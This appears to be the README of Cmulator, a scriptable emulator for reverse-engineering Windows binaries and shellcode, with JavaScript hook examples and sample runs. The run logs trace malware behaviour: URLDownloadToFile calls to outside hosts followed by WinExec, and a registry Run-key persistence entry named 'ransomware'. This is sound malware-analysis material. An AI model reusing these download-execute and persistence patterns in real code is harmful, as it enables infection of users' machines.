Cmulator - Scriptable x86 RE Sandbox Emulator (v0.3 Beta)
Scriptable Reverse Engineering Sandbox Emulator for shellcode and PE binaries
Based on Unicorn & Capstone Engine & javascript .
Cmulator is ( x86 - x64 ) ๐ฌ This is the last supported Pascal version and new code base (C/C++) will be in here Cmulator.
Supported Architectures:
- i386
- x86-64
Supported File Formats
- PE, PE+
- shellcodes
Known problems
- there's a bug in Unicorn modifying data near EIP
if anyone can help please check unicorn#820
Current Features
- Simulated GDT & Segments.
- Simulated TEB & PEB structures for both Shellcodes and PE.
- Simulated LDR Table & Data.
- Manages Image and Stack memory.
- Evaluates functions based on DLL exports.
- Trace all Executed API ( good for Obfuscated PE).
- Displays HexDump with Strings based on referenced memory locations.
- Patching the Memory.
- Custom API hooks using Javascript (scripting).
- Handle SEH (still need more work).
- [+] Hook Address.
- [+] Apiset map resolver
[+] Changelog
-
V0.3 Beta
- This is the last supported Pascal version and new code base (C/C++) will be in here https://github.com/Cmulator/Cmulator .
-
v0.2 beta
- [+] Add Hook Address
- [+] Implementing Api schema forworder
- [+] Change disassembler from Capstone to Zydis Engine
- [โ] improvements for SEH handling
- [โ] improvements with JS to API handle
- [โ] Improve API detection by address or name or ordinal
-
v0.1 beta
- Init version
Hook Example JavaScript
var GetModuleFileName = new ApiHook();
/*
DWORD WINAPI GetModuleFileName(
_In_opt_ HMODULE hModule,
_Out_ LPTSTR lpFilename,
_In_ DWORD nSize
);
*/
GetModuleFileName.OnCallBack = function (Emu, API, ret) {
Emu.pop(); // ret
var hModule = Emu.isx64 ? Emu.ReadReg(REG_RCX) : Emu.pop();
var lpFilename = Emu.isx64 ? Emu.ReadReg(REG_RDX) : Emu.pop();
var nSize = Emu.isx64 ? Emu.ReadReg(REG_R8D) : Emu.pop();
var mName = Emu.GetModuleName(hModule);
var Path = 'C:\\pla\\' + mName;
var len = API.IsWapi ? Emu.WriteStringW(lpFilename,Path) : Emu.WriteStringA(lpFilename,Path);
// null byte - mybe needed maybe not :D - i put it anyway :V
API.IsWapi ? Emu.WriteWord(lpFilename + (len * 2),0) : Emu.WriteByte(lpFilename+len,0);
print("{0}(0x{1}, 0x{2}, 0x{3}) = '{4}'".format(
API.name,
hModule.toString(16),
lpFilename.toString(16),
nSize.toString(16),
Path
));
// MS Docs : the return value is the length of the string
Emu.SetReg(Emu.isx64 ? REG_RAX : REG_EAX, len);
Emu.SetReg(Emu.isx64 ? REG_RIP : REG_EIP, ret);
return true; // true if you handle it false if you want Emu to handle it and set PC .
};
GetModuleFileName.install('kernel32.dll', 'GetModuleFileNameA');
GetModuleFileName.install('kernel32.dll', 'GetModuleFileNameW');
var _vsnprintf = new ApiHook();
/*
int _vsnprintf(
char *buffer,
size_t count,
const char *format,
va_list argptr
);
*/
_vsnprintf.OnCallBack = function (Emu, API, ret) {
// save the param to args
// args is an Array and it's implemented in every ApiHook .
_vsnprintf.args[0] = Emu.isx64 ? Emu.ReadReg(REG_RCX) : Emu.ReadDword(Emu.ReadReg(REG_ESP) + 4);
// i think implementing this in JS is hard
// so just let the library handle it :D
return true; // True so we continue to the lib code .
};
// OnExit Callback ..
_vsnprintf.OnExit = function(Emu,API){
// Read Our Saved Param .
var buffer = _vsnprintf.args[0];
warn("OnExit : _vsnprintf() = '{0}' ".format(
Emu.ReadStringA(buffer)
));
}
_vsnprintf.install('msvcrt.dll', '_vsnprintf');
Example Output :
AntiDebug Downloader
Coldzer0 @ OSX $./Cmulator -f ../../samples/AntiDebugDownloader.exe -q
Cmulator Malware Analyzer - By Coldzer0
Compiled on : 2018/09/29 - 01:51:51
Target CPU : i386 & x86_x64
Unicorn Engine : v1.0
Cmulator : v0.1
"AntiDebugDownloader.exe" is : x32
Mapping the File ..
[+] Unicorn Init done .
[โ] Set Hooks
[โ] PE Mapped to Unicorn
[โ] PE Written to Unicorn
[---------------- PE Info --------------]
[*] File Name : AntiDebugDownloader.exe
[*] Image Base : 0000000000400000
[*] Address Of Entry : 0000000000001000
[*] Size Of Headers : 0000000000000400
[*] Size Of Image : 0000000000004000
[---------------------------------------]
[---------------------------------------]
[ Fixing PE Imports ]
[*] File Name : AntiDebugDownloader.exe
[*] Import 3 Dlls
[+] Fix IAT for : kernel32.dll
[+] Fix IAT for : urlmon.dll
[+] Fix IAT for : advapi32.dll
[---------------------------------------]
[+] Segments & (TIB - PEB) Init Done .
[+] Loading JS Main Script : ../API.JS
Initiating 52 Libraries ...
[>] Run AntiDebugDownloader.exe
0x401005 : IsDebuggerPresent = 0
GetWindowsDirectoryA(403000, 260) = 10 - 'C:\Windows'
0x40103d : URLDownloadToFileA(0, 'https://www.dropbox.com/s/fr3z6axblxfcmq8/UrlDownLoadtoFile.exe?dl=0', 'C:\Windows', 0, 0)
0x401051 : RegCreateKeyA(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run', 0x403159) = 144
0x40106f : RegSetValueExA(144, 'ransomware', 0, REG_SZ, 'C:\Windows', 260)
0x40107a : RegCloseKey()
ExitProcess(0x0)
26 Branches - Executed in 9 ms
Cmulator Stop >> last Error : OK (UC_ERR_OK)
Press Enter to Close ยฏ\_(ใ)_/ยฏ
x64 Down & Exec ShellCode
Coldzer0 @ OSX $./Cmulator -f ../../samples/Shellcodes/down_exec64.sc -sc -x64
Cmulator Malware Analyzer - By Coldzer0
Compiled on : 2018/09/29 - 03:07:11
Target CPU : i386 & x86_x64
Unicorn Engine : v1.0
Cmulator : v0.1
"sc64.exe" is : x64
Mapping the File ..
[+] Unicorn Init done .
[โ] Set Hooks
[โ] PE Mapped to Unicorn
[โ] PE Written to Unicorn
[---------------- PE Info --------------]
[*] File Name : sc64.exe
[*] Image Base : 0000000000400000
[*] Address Of Entry : 0000000000001000
[*] Size Of Headers : 0000000000000400
[*] Size Of Image : 0000000000002000
[---------------------------------------]
[*] Writing Shellcode to memory ...
[โ] Shellcode Written to Unicorn
[---------------------------------------]
[ Fixing PE Imports ]
[*] File Name : sc64.exe
[*] Import 0 Dlls
[---------------------------------------]
[+] Segments & (TIB - PEB) Init Done .
[+] Loading JS Main Script : ../API.JS
Initiating 25 Libraries ...
[>] Run sc64.exe
LoadLibraryA('urlmon') = 0x70714000
GetProcAddress(0x70714000,'URLDownloadToFileA') = 0x707ADB10
0x40111b : URLDownloadToFileA(0, 'http://192.168.10.129/pl.exe', 'C:\\Users\\Public\\p.exe', 0, 2489880)
SetFileAttributesA('C:\\Users\\Public\\p.exe',0x2)
WinExec('C:\\Users\\Public\\p.exe', 0)
FatalExit(0x0)
95 Steps - Executed in 295 ms
Cmulator Stop >> last Error : OK (UC_ERR_OK)
Press Enter to Close ยฏ\_(ใ)_/ยฏ
x32 Down & Exec ShellCode
Coldzer0 @ OSX $./Cmulator -f ../../samples/Shellcodes/URLDownloadToFile.sc -sc
Cmulator Malware Analyzer - By Coldzer0
Compiled on : 2018/09/29 - 03:07:11
Target CPU : i386 & x86_x64
Unicorn Engine : v1.0
Cmulator : v0.1
"sc32.exe" is : x32
Mapping the File ..
[+] Unicorn Init done .
[โ] Set Hooks
[โ] PE Mapped to Unicorn
[โ] PE Written to Unicorn
[---------------- PE Info --------------]
[*] File Name : sc32.exe
[*] Image Base : 0000000000400000
[*] Address Of Entry : 0000000000001000
[*] Size Of Headers : 0000000000000400
[*] Size Of Image : 0000000000002000
[---------------------------------------]
[*] Writing Shellcode to memory ...
[โ] Shellcode Written to Unicorn
[---------------------------------------]
[ Fixing PE Imports ]
[*] File Name : sc32.exe
[*] Import 0 Dlls
[---------------------------------------]
[+] Segments & (TIB - PEB) Init Done .
[+] Loading JS Main Script : ../API.JS
Initiating 25 Libraries ...
[>] Run sc32.exe
GetProcAddress(0x70300000,'LoadLibraryA') = 0x703149D7
LoadLibraryA('urlmon.dll') = 0x7065a000
GetProcAddress(0x7065A000,'URLDownloadToFileA') = 0x706F08D0
GetProcAddress(0x70300000,'WinExec') = 0x70392C21
0x40113b : URLDownloadToFileA(0, 'https://rstforums.com/fisiere/dead.exe', 'dead.exe', 0, 0)
WinExec('dead.exe', 1)
3041 Steps - Executed in 415 ms
Cmulator Stop >> last Error : OK (UC_ERR_OK)
Press Enter to Close ยฏ\_(ใ)_/ยฏ
Show SEH handling (PELock Obfuscator)
Coldzer0 @ OSX $./Cmulator -f ../../samples/obfuscated/obfuscated.exe -ex
Cmulator Malware Analyzer - By Coldzer0
Compiled on : 2018/09/29 - 03:07:11
Target CPU : i386 & x86_x64
Unicorn Engine : v1.0
Cmulator : v0.1
"obfuscated.exe" is : x32
Mapping the File ..
[+] Unicorn Init done .
[โ] Set Hooks
[โ] PE Mapped to Unicorn
[โ] PE Written to Unicorn
[---------------- PE Info --------------]
[*] File Name : obfuscated.exe
[*] Image Base : 0000000000400000
[*] Address Of Entry : 000000000000A4BD
[*] Size Of Headers : 0000000000001000
[*] Size Of Image : 000000000000F000
[---------------------------------------]
[---------------------------------------]
[ Fixing PE Imports ]
[*] File Name : obfuscated.exe
[*] Import 2 Dlls
[+] Fix IAT for : KERNEL32.dll
[+] Fix IAT for : USER32.dll
[---------------------------------------]
[+] Segments & (TIB - PEB) Init Done .
[+] Loading JS Main Script : ../API.JS
Initiating 44 Libraries ...
[>] Run obfuscated.exe
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 1, data value = 0x0
0x403031 Exception caught SEH 0x25FEEC - Handler 0x409215
ZwContinue -> Context = 0x25F97C
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x4056EC Exception caught SEH 0x25FEE8 - Handler 0x402516
ZwContinue -> Context = 0x25F978
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x401974 Exception caught SEH 0x25FEE4 - Handler 0x4019CE
ZwContinue -> Context = 0x25F974
MessageBoxA(0, 'Hello world', 'Visit us at www.pelock.com', 64)
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x403A49 Exception caught SEH 0x25FEF4 - Handler 0x40A17B
ZwContinue -> Context = 0x25F984
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x40AD64 Exception caught SEH 0x25FEF4 - Handler 0x40B461
ZwContinue -> Context = 0x25F984
ExitProcess(0x0)
7387 Steps - Executed in 118 ms
Cmulator Stop >> last Error : OK (UC_ERR_OK)
Press Enter to Close ยฏ\_(ใ)_/ยฏ
Hide SEH handling (PELock Obfuscator)
Coldzer0 @ OSX $./Cmulator -f ../../samples/obfuscated/obfuscated.exe
Cmulator Malware Analyzer - By Coldzer0
Compiled on : 2018/09/29 - 03:07:11
Target CPU : i386 & x86_x64
Unicorn Engine : v1.0
Cmulator : v0.1
"obfuscated.exe" is : x32
Mapping the File ..
[+] Unicorn Init done .
[โ] Set Hooks
[โ] PE Mapped to Unicorn
[โ] PE Written to Unicorn
[---------------- PE Info --------------]
[*] File Name : obfuscated.exe
[*] Image Base : 0000000000400000
[*] Address Of Entry : 000000000000A4BD
[*] Size Of Headers : 0000000000001000
[*] Size Of Image : 000000000000F000
[---------------------------------------]
[---------------------------------------]
[ Fixing PE Imports ]
[*] File Name : obfuscated.exe
[*] Import 2 Dlls
[+] Fix IAT for : KERNEL32.dll
[+] Fix IAT for : USER32.dll
[---------------------------------------]
[+] Segments & (TIB - PEB) Init Done .
[+] Loading JS Main Script : ../API.JS
Initiating 44 Libraries ...
[>] Run obfuscated.exe
MessageBoxA(0, 'Hello world', 'Visit us at www.pelock.com', 64)
ExitProcess(0x0)
7387 Steps - Executed in 116 ms
Cmulator Stop >> last Error : OK (UC_ERR_OK)
Press Enter to Close ยฏ\_(ใ)_/ยฏ
๐
And Try it Your Self , find it at "samples/obfuscated/obfuscated.exe" WIP BY Priority :
- Memory Manager - Next version
- Checking for Bug & fixing them ๐๐ป
- Api schema forwarder still need more improvements and testing
TODO BY Priority :
- PC (RIP - EIP) Hook.
- improving exception handling.
- Native Plugins & API Hook Libs.
- Api schema forwarder.
- Add Memory Manager.
- Sysenter / Syscall Global Hook in JS.
- Control TEB/PEB in JS.
- Interactive debug shell.
- Add Assembler.
- Implement Threading.
Requirements
- Freepascal >= v3
- Unicorn Engine
- Zydis Engine
- QuickJS Engine
Installation
- Install Lazarus IDE
- You will find all needed libraries in "libraries" Folder ;)
- Now Build
Build
1. Build Cmulator
git clone https://github.com/Coldzer0/Cmulator.git
Open "Cmulator.lpi" with Lazarus IDE
Then Hit Compile :D
Oh Before that you need to select the Build Mode
From Laz IDE Select
Projects -> Project Options -> Compiler Options
and Select the Mode for your OS .
Releases
Or Just Download From2. Create config.json config file
touch config.json
3. Set Win dlls Path
set the dll folders to where you stored your windows dlls and JS Main File .
{
"system": {
"win32": "../win_dlls/x32_win7",
"win64": "../win_dlls/x64_win7",
"Apiset": "../Apiset.json"
},
"JS": {
"main": "../API.JS"
}
}
Run
./Cmulator -file samples/AntiDebug.exe
Documentation
Still working on it , will be available soon.
Acknowledgements & Resources :
this work inspired by :
- unicorn-libemu-shim - The Main Reason i started this Project
โค . - LIBEMU - Hooking Methods .
- SCDBG - The InterActive Debugger .
- xori - I Used there Method To Build LDR .
Used OpenSource Projects :
- QuickJS Engine
- Unicorn Engine
- Zydis Engine
- PE Parser
- Pse PE Parse
- generics collections
- Super Object (JSON)
Resouces Used :
- Microsoft Docs
- Understanding the PEB Loader Data Structure
- Wine
- Nynaeve Blog
- ReWolf terminus - Windows data structures
- OS Dev - GDT_Tutorial
- Set up a GDT in Unicorn